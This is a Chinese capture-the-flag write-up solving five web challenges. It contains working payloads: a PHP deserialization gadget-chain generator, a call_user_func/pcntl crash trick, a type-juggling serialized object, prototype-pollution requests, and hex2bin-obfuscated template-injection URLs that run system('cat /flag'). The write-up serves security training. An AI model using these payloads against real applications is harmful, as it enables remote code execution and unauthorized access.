划水的国赛Web

babyunserialize

www.zip源码泄露

参考 http://blog.ccreater.top/ wmctf 2020 webweb

<?php
namespace DB{
abstract class Cursor implements \IteratorAggregate {}
}
namespace DB\SQL{
// Stub with the property layout the script serializes; method bodies are empty
// because only the property values reach serialize().
class Mapper extends \DB\Cursor
{
    // Declaration order is kept: serialize() emits properties in declaration
    // order, so reordering these would change the emitted payload.
    protected $props = ['quotekey' => 'call_user_func'];
    protected $adhoc = ['phpinfo' => ['expr' => '']];
    protected $db;

    /** @param mixed $val stored verbatim in $db */
    function __construct($val)
    {
        $this->db = $val;
    }

    // ArrayAccess-style and IteratorAggregate methods: intentionally no-ops.
    function offsetExists($offset)
    {
    }

    function offsetGet($offset)
    {
    }

    function offsetSet($offset, $value)
    {
    }

    function offsetUnset($offset)
    {
    }

    function getIterator()
    {
    }
}
}
namespace CLI{
// Stub carrying the two properties the payload needs: a nested Mapper pair under
// events['disconnect'] and a self-reference in $server.
class Agent
{
    protected $server = "";
    public $events;

    public function __construct()
    {
        $inner = new \DB\SQL\Mapper("");
        $this->events = ['disconnect' => [new \DB\SQL\Mapper($inner), 'find']];
        // Reference to the object itself; serialize() records it as a
        // back-reference instead of copying the object.
        $this->server = &$this;
    }
}
class WS{}
}
namespace {
echo urlencode(serialize(array(new \CLI\WS(),new \CLI\Agent())));
}

easyphp

迭代使用call_user_func调用pcntl函数致使异常

http://eci-2zed3ztpomt9kf7xbbng.cloudeci1.ichunqiu.com/?a=call_user_func&b=pcntl_wait

easytrick

源码如下

<?php
class trick{
// Both properties are populated by unserialize() below; there is no constructor.
public $trick1;
public $trick2;
// Runs when the object is released, i.e. right after unserialize() returns.
public function __destruct(){
// Only trick1 is cast to string; trick2 keeps whatever type unserialize() gave it.
$this->trick1 = (string)$this->trick1;
// strlen() on a non-string trick2 relies on implicit conversion (no strict_types).
if(strlen($this->trick1) > 5 || strlen($this->trick2) > 5){
die("你太长了");
}
// Strict (!==) and loose (!=) comparisons mixed around md5(), with only one side
// cast to string: non-string values can satisfy all three clauses at once.
// Casting both sides to string and comparing strictly would close this.
if($this->trick1 !== $this->trick2 && md5($this->trick1) === md5($this->trick2) && $this->trick1 != $this->trick2){
echo file_get_contents("/flag");
}
}
}
highlight_file(__FILE__);
// Deserializes request-controlled input; __destruct of whatever object results
// runs as soon as the value is discarded.
$serialized = $_GET['trick'];
unserialize($serialized);

弱类型判断绕过：trick1 为整数 1，(string) 转换后是 "1"；trick2 为浮点数 0.9999999999999999，在默认 precision 下转换为字符串同样得到 "1"，因此两者的 md5 相等，而 !== 与 != 比较仍然成立。

O:5:"trick":2:{s:6:"trick1";i:1;s:6:"trick2";d:0.9999999999999999;}

littlegame

查看package.json,发现set-value存在原型链污染 https://www.anquanke.com/vul/id/1715582

{
"name": "littlegame",
"version": "1.0.0",
"private": true,
"scripts": {
"start": "node ./bin/www"
},
"dependencies": {
"cookie-parser": "~1.4.4",
"debug": "~2.6.9",
"express": "~4.16.1",
"express-session": "^1.17.1",
"morgan": "~1.9.1",
"set-value": "^3.0.0"
}
}

在index.js找到flag接口

// Admin credentials come from the environment. Plain object literal: a lookup by
// an untrusted key (Admin[key]) also walks Object.prototype.
const Admin = {
  password1: process.env.p1,
  password2: process.env.p2,
  password3: process.env.p3,
};
...
router.post("/DeveloperControlPanel", function (req, res, next) {
  // not implement
  const body = req.body;
  if (body.key === undefined || body.password === undefined) {
    res.send("What's your problem?");
    return;
  }
  const key = body.key.toString();
  const password = body.password.toString();
  // Admin[key] follows the prototype chain, so a polluted Object.prototype
  // satisfies this check; an own-property test such as
  // Object.prototype.hasOwnProperty.call(Admin, key) would confine the lookup.
  const matched = Admin[key] === password;
  res.send(matched ? process.env.flag : "Wrong password!Are you Admin?");
});
...
router.post("/Privilege", function (req, res, next) {
  // Why not ask witch for help?
  if (req.session.knight === undefined) {
    res.redirect('/SpawnPoint');
    return;
  }
  const body = req.body;
  if (body.NewAttributeKey === undefined || body.NewAttributeValue === undefined) {
    res.send("What's your problem?");
    return;
  }
  const key = body.NewAttributeKey.toString();
  const value = body.NewAttributeValue.toString();
  // key is request-controlled and (presumably, via set-value) interpreted as a
  // dotted path; rejecting "__proto__"/"constructor"/"prototype" segments or
  // upgrading the dependency stops writes from reaching Object.prototype.
  setFn(req.session.knight, key, value);
  res.send("Let's have a check!");
});

构造如下exp:

http://eci-2ze2t1c804gx9bfude7s.cloudeci1.ichunqiu.com:8888/Privilege
POST NewAttributeKey=__proto__.password4&NewAttributeValue=tyao

http://eci-2ze2t1c804gx9bfude7s.cloudeci1.ichunqiu.com:8888/DeveloperControlPanel
POST key=password4&password=tyao

rceme

参考 https://blog.csdn.net/qq_45708109/article/details/107645816

可以绕过的函数有很多,这里使用hex2bin

// phpinfo
?a={if:var_dump((hex2bin(%27706870696e666f%27))())}Tyao{end%20if}
// cat /flag
?a={if:var_dump(((hex2bin(%2773797374656d%27))(%27cat%20/flag%27)))}Tyao{end%20if}